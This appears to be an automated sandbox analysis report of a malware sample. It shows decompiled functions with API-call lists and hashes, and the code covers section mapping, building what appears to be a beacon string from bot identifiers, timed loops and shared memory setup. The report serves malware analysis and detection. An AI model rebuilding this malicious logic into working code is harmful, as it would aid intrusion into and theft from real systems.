Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
String ID:
API String ID: 2954739140-0
Opcode ID: 32f32dd5c34fa0179f307d93b3f404df61f7fdc8145abeb24d11dcf21c1c1868
Instruction ID: cedec957dddc55fc659acb823c96183bf2ba240a57e1fe86eaca9d964e68471b
Opcode Fuzzy Hash: 32f32dd5c34fa0179f307d93b3f404df61f7fdc8145abeb24d11dcf21c1c1868
Instruction Fuzzy Hash: 3211A9766006166BF321D7E98C85EDF77FCEF452D4B010528FA01D7645EA60FD1587A0

Uniqueness

Uniqueness Score: -1.00%

Function 10001AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001AD1(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001ae3
0x10001ae9
0x10001af7
0x10001afe
0x10001b03
0x10001b09
0x00000000
0x10001b0a
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C94,00000002,00000000,?,?,00000000,?,?,10001C94,?), ref: 10001AFE

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 13f28c4cc4fc02fee0a52066f9704316f59fb495cf6e721c0db2f3a3c6bf4340
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 71F082B590020CBFEB119FA4CC84C9FBBBCEB48294B104939B152E1090E3309E088A60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA90BA, Relevance: 33.3, APIs: 22, Instructions: 266
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FA90BA(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				int _t76;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr _t108;
				void* _t110;
				intOrPtr _t115;
				signed int _t119;
				char** _t121;
				int _t124;
				signed int _t126;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr _t136;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t143;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t158;
				int _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t165;
				void* _t167;
				long _t171;
				intOrPtr* _t172;
				intOrPtr* _t175;
				void* _t176;
				void* _t178;
				void* _t179;
				void* _t184;

				_t158 = __edx;
				_t148 = __ecx;
				_t64 = __eax;
				_t147 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t64 = GetTickCount();
				}
				_t65 =  *0xfad018; // 0x8a48e7c8
				asm("bswap eax");
				_t66 =  *0xfad014; // 0x5cb11ae7
				asm("bswap eax");
				_t67 =  *0xfad010; // 0x15dc9586
				asm("bswap eax");
				_t68 =  *0xfad00c; // 0x67522d90
				asm("bswap eax");
				_t69 =  *0xfad230; // 0x2a9a5a8
				_t3 = _t69 + 0xfae622; // 0x74666f73
				_t161 = wsprintfA(_t147, _t3, 3, 0x3d13b, _t68, _t67, _t66, _t65,  *0xfad02c,  *0xfad004, _t64);
				_t72 = E00FA7C63();
				_t73 =  *0xfad230; // 0x2a9a5a8
				_t4 = _t73 + 0xfae662; // 0x74707526
				_t76 = wsprintfA(_t161 + _t147, _t4, _t72);
				_t178 = _t176 + 0x38;
				_t162 = _t161 + _t76;
				if(_a8 != 0) {
					_t143 =  *0xfad230; // 0x2a9a5a8
					_t8 = _t143 + 0xfae66d; // 0x732526
					_t146 = wsprintfA(_t162 + _t147, _t8, _a8);
					_t178 = _t178 + 0xc;
					_t162 = _t162 + _t146;
				}
				_t77 = E00FA4930(_t148);
				_t78 =  *0xfad230; // 0x2a9a5a8
				_t10 = _t78 + 0xfae38a; // 0x6d697426
				_t163 = _t162 + wsprintfA(_t162 + _t147, _t10, _t77, _t158);
				_t82 =  *0xfad230; // 0x2a9a5a8
				_t12 = _t82 + 0xfae7b4; // 0x3a48d5c
				_t184 = _a4 - _t12;
				_t14 = _t82 + 0xfae33b; // 0x74636126
				_t160 = 0 | _t184 == 0x00000000;
				_t164 = _t163 + wsprintfA(_t163 + _t147, _t14, _t184 == 0);
				_t86 =  *0xfad278; // 0x3a495e0
				_t179 = _t178 + 0x1c;
				if(_t86 != 0) {
					_t139 =  *0xfad230; // 0x2a9a5a8
					_t18 = _t139 + 0xfae8ea; // 0x3d736f26
					_t142 = wsprintfA(_t164 + _t147, _t18, _t86);
					_t179 = _t179 + 0xc;
					_t164 = _t164 + _t142;
				}
				_t87 =  *0xfad284; // 0x3a495b0
				if(_t87 != 0) {
					_t136 =  *0xfad230; // 0x2a9a5a8
					_t20 = _t136 + 0xfae685; // 0x73797326
					wsprintfA(_t164 + _t147, _t20, _t87);
					_t179 = _t179 + 0xc;
				}
				_t165 =  *0xfad2d4; // 0x3a49630
				_t89 = E00FA66E0(0xfad00a, _t165 + 4);
				_t171 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					RtlFreeHeap( *0xfad1f0, _t171, _t147); // executed
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0xfad1f0, 0, 0x800);
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0xfad1f0, _t171, _v12);
						goto L28;
					}
					E00FA28E3(GetTickCount());
					_t96 =  *0xfad2d4; // 0x3a49630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0xfad2d4; // 0x3a49630
					__imp__(_t100 + 0x40);
					_t102 =  *0xfad2d4; // 0x3a49630
					_t167 = E00FA49EC(1, _t160, _t147,  *_t102);
					_v20 = _t167;
					asm("lock xadd [eax], ecx");
					if(_t167 == 0) {
						L26:
						RtlFreeHeap( *0xfad1f0, _t171, _a8); // executed
						goto L27;
					}
					StrTrimA(_t167, 0xfac2c4);
					_t108 =  *0xfad230; // 0x2a9a5a8
					_push(_t167);
					_t24 = _t108 + 0xfae2d2; // 0x53002f
					_t110 = E00FA9FA4(_t24);
					_v8 = _t110;
					if(_t110 == 0) {
						L25:
						RtlFreeHeap( *0xfad1f0, _t171, _t167); // executed
						goto L26;
					}
					 *_t167 = 0;
					__imp__(_a8, _v12);
					_t172 = __imp__;
					 *_t172(_a8, _v8);
					 *_t172(_a8, _t167);
					_t115 = E00FA8DEA(0, _a8);
					_a4 = _t115;
					if(_t115 == 0) {
						_a20 = 8;
						L23:
						E00FA54F9();
						L24:
						RtlFreeHeap( *0xfad1f0, 0, _v8); // executed
						_t171 = 0;
						goto L25;
					}
					_t119 = E00FA4759(_t147, 0xffffffffffffffff, _t167,  &_v16); // executed
					_a20 = _t119;
					if(_t119 == 0) {
						_t175 = _v16;
						_t126 = E00FA9A14(_t175, _a4, _a12, _a16); // executed
						_a20 = _t126;
						_t127 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t127 + 0x80))(_t127);
						_t129 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *((intOrPtr*)(_t175 + 4));
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						_t133 =  *_t175;
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						E00FAA07B(_t175);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t121 = _a12;
							if(_t121 != 0) {
								_t168 =  *_t121;
								_t173 =  *_a16;
								wcstombs( *_t121,  *_t121,  *_a16);
								_t124 = E00FA6C66(_t168, _t168, _t173 >> 1);
								_t167 = _v20;
								 *_a16 = _t124;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00FAA07B(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00fa90ba
0x00fa90ba
0x00fa90ba
0x00fa90c3
0x00fa90c8
0x00fa90cf
0x00fa90d1
0x00fa90d1
0x00fa90de
0x00fa90e9
0x00fa90ec
0x00fa90f7
0x00fa90fa
0x00fa90ff
0x00fa9102
0x00fa9107
0x00fa910a
0x00fa9116
0x00fa9123
0x00fa9125
0x00fa912b
0x00fa9130
0x00fa913b
0x00fa913d
0x00fa9140
0x00fa9146
0x00fa9148
0x00fa9150
0x00fa915b
0x00fa915d
0x00fa9160
0x00fa9160
0x00fa9162
0x00fa9169
0x00fa916e
0x00fa917b
0x00fa917d
0x00fa9182
0x00fa918a
0x00fa918d
0x00fa9193
0x00fa919e
0x00fa91a0
0x00fa91a5
0x00fa91aa
0x00fa91ad
0x00fa91b2
0x00fa91bd
0x00fa91bf
0x00fa91c2
0x00fa91c2
0x00fa91c4
0x00fa91cb
0x00fa91ce
0x00fa91d3
0x00fa91dd
0x00fa91df
0x00fa91df
0x00fa91e2
0x00fa91f0
0x00fa91f5
0x00fa91f9
0x00fa91fc
0x00fa93d4
0x00fa93dc
0x00fa93e9
0x00fa9202
0x00fa920e
0x00fa9216
0x00fa9219
0x00fa93c4
0x00fa93ce
0x00000000
0x00fa93ce
0x00fa9225
0x00fa922a
0x00fa9233
0x00fa9244
0x00fa9248
0x00fa9251
0x00fa9257
0x00fa9264
0x00fa926b
0x00fa9274
0x00fa927a
0x00fa93b4
0x00fa93be
0x00000000
0x00fa93be
0x00fa9286
0x00fa928c
0x00fa9291
0x00fa9292
0x00fa9299
0x00fa92a0
0x00fa92a3
0x00fa93a6
0x00fa93ae
0x00000000
0x00fa93ae
0x00fa92ac
0x00fa92b2
0x00fa92bb
0x00fa92c4
0x00fa92ca
0x00fa92d1
0x00fa92d8
0x00fa92db
0x00fa93ec
0x00fa938e
0x00fa938e
0x00fa9393
0x00fa939e
0x00fa93a4
0x00000000
0x00fa93a4
0x00fa92e5
0x00fa92ec
0x00fa92ef
0x00fa92f4
0x00fa92ff
0x00fa9304
0x00fa9307
0x00fa930d
0x00fa9313
0x00fa9319
0x00fa931c
0x00fa9322
0x00fa9325
0x00fa932a
0x00fa932e
0x00fa932e
0x00fa933a
0x00fa9346
0x00fa934a
0x00fa934c
0x00fa9351
0x00fa9353
0x00fa9358
0x00fa935d
0x00fa936a
0x00fa9372
0x00fa9375
0x00fa9375
0x00fa9351
0x00000000
0x00fa933c
0x00fa9340
0x00fa9377
0x00fa937a
0x00fa9383
0x00000000
0x00000000
0x00000000
0x00000000
0x00fa9383
0x00fa9342
0x00000000
0x00fa9342
0x00fa933a

APIs

GetTickCount.KERNEL32 ref: 00FA90D1
wsprintfA.USER32 ref: 00FA911E
wsprintfA.USER32 ref: 00FA913B
wsprintfA.USER32 ref: 00FA915B
wsprintfA.USER32 ref: 00FA9179
wsprintfA.USER32 ref: 00FA919C
wsprintfA.USER32 ref: 00FA91BD
wsprintfA.USER32 ref: 00FA91DD
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA920E
GetTickCount.KERNEL32 ref: 00FA921F
RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA9233
RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA9251

Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F
Part of subcall function 00FA49EC: strcpy.NTDLL ref: 00FA4A36
Part of subcall function 00FA49EC: lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41
Part of subcall function 00FA49EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E

StrTrimA.SHLWAPI(00000000,00FAC2C4,?,03A49630), ref: 00FA9286

Part of subcall function 00FA9FA4: lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
Part of subcall function 00FA9FA4: lstrlen.KERNEL32(?), ref: 00FA9FB8
Part of subcall function 00FA9FA4: lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
Part of subcall function 00FA9FA4: lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA

lstrcpy.KERNEL32(00000000,?), ref: 00FA92B2
lstrcat.KERNEL32(00000000,?), ref: 00FA92C4
lstrcat.KERNEL32(00000000,00000000), ref: 00FA92CA

Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C

wcstombs.NTDLL ref: 00FA935D

Part of subcall function 00FA9A14: SysAllocString.OLEAUT32(00000000), ref: 00FA9A55
Part of subcall function 00FA9A14: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FA9AD7
Part of subcall function 00FA9A14: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FA9B16

Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00FA939E
RtlFreeHeap.NTDLL(00000000,00000000,0053002F,00000000), ref: 00FA93AE
RtlFreeHeap.NTDLL(00000000,00000000,?,03A49630), ref: 00FA93BE
HeapFree.KERNEL32(00000000,?), ref: 00FA93CE
RtlFreeHeap.NTDLL(00000000,?), ref: 00FA93DC

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: 8186eb21a2ef00a942a1130cb4f0c7b403442091fd66eec941679cb7e2f688cc
Instruction ID: 19eec0539b5fa280419557bea6426ec927ffe73bb1809455eff6878a9a8c7301
Opcode Fuzzy Hash: 8186eb21a2ef00a942a1130cb4f0c7b403442091fd66eec941679cb7e2f688cc
Instruction Fuzzy Hash: A8A13AF1900209EFCB11DF68DC88EAA3BB9FF4A354B154465F846C7260DB74E951EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9C23, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FA9C23(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xfad1f8);
					_v20 = 0;
					_v16 = 0;
					L00FAAEF0();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xfad224; // 0x298
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xfad204 = 5;
						} else {
							_t69 = E00FA4B22(); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xfad218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00FA7790( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00FA259A(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xfad1fc);
							goto L21;
						} else {
							__eflags =  *0xfad200; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00FA54F9();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xfad200);
								L21:
								L00FAAEF0();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xfad1f0, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					FindCloseChangeNotification(_v44); // executed
				}
				return _v8;
				goto L25;
			}

0x00fa9c23
0x00fa9c35
0x00fa9c38
0x00fa9c44
0x00fa9c4c
0x00fa9c4f
0x00fa9db5
0x00fa9c55
0x00fa9c55
0x00fa9c57
0x00fa9c5c
0x00fa9c5d
0x00fa9c63
0x00fa9c66
0x00fa9c69
0x00fa9c77
0x00fa9c82
0x00fa9c85
0x00fa9c87
0x00fa9c94
0x00fa9c9e
0x00fa9ca2
0x00fa9ca5
0x00fa9caa
0x00fa9cb5
0x00fa9cb5
0x00fa9cac
0x00fa9cac
0x00fa9cb3
0x00000000
0x00000000
0x00fa9cb3
0x00fa9cbf
0x00000000
0x00fa9cc2
0x00fa9cc6
0x00fa9cd1
0x00fa9cd1
0x00fa9cd8
0x00fa9cdd
0x00fa9ce4
0x00fa9ced
0x00fa9cf3
0x00fa9cf6
0x00fa9cfd
0x00fa9d00
0x00000000
0x00000000
0x00fa9d02
0x00fa9d05
0x00fa9d08
0x00fa9d0b
0x00000000
0x00fa9d0d
0x00fa9d1c
0x00fa9d1c
0x00000000
0x00fa9d4a
0x00fa9d4a
0x00fa9d4f
0x00fa9d6e
0x00fa9d70
0x00fa9d75
0x00fa9d76
0x00000000
0x00fa9d51
0x00fa9d51
0x00fa9d57
0x00000000
0x00fa9d59
0x00fa9d59
0x00fa9d5e
0x00fa9d60
0x00fa9d65
0x00fa9d66
0x00fa9d7c
0x00fa9d7c
0x00fa9d84
0x00fa9d8f
0x00fa9d92
0x00fa9d9d
0x00fa9d9f
0x00fa9da1
0x00fa9da4
0x00000000
0x00fa9daa
0x00000000
0x00fa9daa
0x00fa9da4
0x00fa9d57
0x00000000
0x00fa9d4f
0x00fa9d1f
0x00fa9d21
0x00fa9d24
0x00fa9d25
0x00fa9d25
0x00fa9d29
0x00fa9d33
0x00fa9d33
0x00fa9d39
0x00fa9d3c
0x00fa9d3c
0x00fa9d42
0x00fa9d42
0x00fa9dbf
0x00000000

APIs

memset.NTDLL ref: 00FA9C38
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00FA9C44
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00FA9C69
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00FA9C85
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FA9C9E
HeapFree.KERNEL32(00000000,00000000), ref: 00FA9D33
FindCloseChangeNotification.KERNELBASE(?), ref: 00FA9D42
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00FA9D7C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00FA7299), ref: 00FA9D92
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FA9D9D

Part of subcall function 00FA4B22: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03A49328,00000000,?,73BCF710,00000000,73BCF730), ref: 00FA4B71
Part of subcall function 00FA4B22: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03A49360,?,00000000,30314549,00000014,004F0053,03A4931C), ref: 00FA4C0E
Part of subcall function 00FA4B22: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FA9CB1), ref: 00FA4C20

GetLastError.KERNEL32 ref: 00FA9DAF

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$ChangeCloseCreateErrorFindLastNotificationmemset
String ID:
API String ID: 1236040543-0
Opcode ID: a1be9b856d7baaf35530aa42273d1514e685b20d1b48853b1a8b972ef524be6a
Instruction ID: 673e8668909481dff6530a4a9bad326380ef801637949e4beda900c1b6bedd71
Opcode Fuzzy Hash: a1be9b856d7baaf35530aa42273d1514e685b20d1b48853b1a8b972ef524be6a
Instruction Fuzzy Hash: 4D512FF5D05129EADF109F94DC449EEBFB9EF0A720F204126F511E6190D7B49A84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA24C2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00FA24C2(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xfad1f0 = _t14;
				if(_t14 != 0) {
					 *0xfad160 = GetTickCount();
					_t16 = E00FA4CF4(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00FAB04E();
						_t40 = _t18 + _t20;
						_t22 = E00FA85F0(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xfad20c; // 0x29c
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xfad218 = 1; // executed
						}
					}
					_t16 = E00FA707F(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00fa24c2
0x00fa24d7
0x00fa24df
0x00fa24e4
0x00fa24f7
0x00fa24fc
0x00fa2503
0x00fa258b
0x00fa2591
0x00000000
0x00000000
0x00000000
0x00fa2509
0x00fa2509
0x00fa250e
0x00fa2514
0x00fa251a
0x00fa2524
0x00fa2528
0x00fa2529
0x00fa252e
0x00fa252f
0x00fa2530
0x00fa2535
0x00fa253b
0x00fa2544
0x00fa254a
0x00fa2550
0x00fa2555
0x00fa255c
0x00fa2560
0x00fa2568
0x00fa2570
0x00fa2572
0x00fa2572
0x00fa257a
0x00fa257c
0x00fa257c
0x00fa257a
0x00fa2586
0x00000000
0x00fa2586
0x00fa24e8
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FA24D7
GetTickCount.KERNEL32 ref: 00FA24EE
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00FA250E
SwitchToThread.KERNEL32(?,00000001), ref: 00FA2514
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00FA2530
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00FA254A
IsWow64Process.KERNEL32(0000029C,?,?,00000001), ref: 00FA2568

Strings

!I, xrefs: 00FA24F7

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: !I
API String ID: 3690864001-1739487307
Opcode ID: 76cf54e0f08e75333430e22ce6fb5f31f650c1f85da4dd41b10c3ac059512916
Instruction ID: f6128b50d1ae151ed990f18212990ab024f075bf8fd003f23acda6b0708349bf
Opcode Fuzzy Hash: 76cf54e0f08e75333430e22ce6fb5f31f650c1f85da4dd41b10c3ac059512916
Instruction Fuzzy Hash: 2421D5F2E00309AFD310AF68DC89B2A7BE8BB46360F048929F505C2150E774DC04ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001DBD, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001DBD(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002150();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004150;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000214A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001dbd
0x10001dc6
0x10001dca
0x10001dd0
0x10001dd5
0x10001dda
0x10001ddd
0x10001de0
0x10001de5
0x10001de6
0x10001de9
0x10001df4
0x10001dfb
0x10001dff
0x10001e01
0x10001e02
0x10001e05
0x10001e0a
0x10001e14
0x10001e16
0x10001e16
0x10001e2a
0x10001e30
0x10001e34
0x10001e84
0x10001e36
0x10001e3f
0x10001e55
0x10001e5d
0x10001e6f
0x10001e73
0x00000000
0x00000000
0x10001e5f
0x10001e62
0x10001e67
0x10001e69
0x10001e69
0x10001e4a
0x10001e4c
0x10001e75
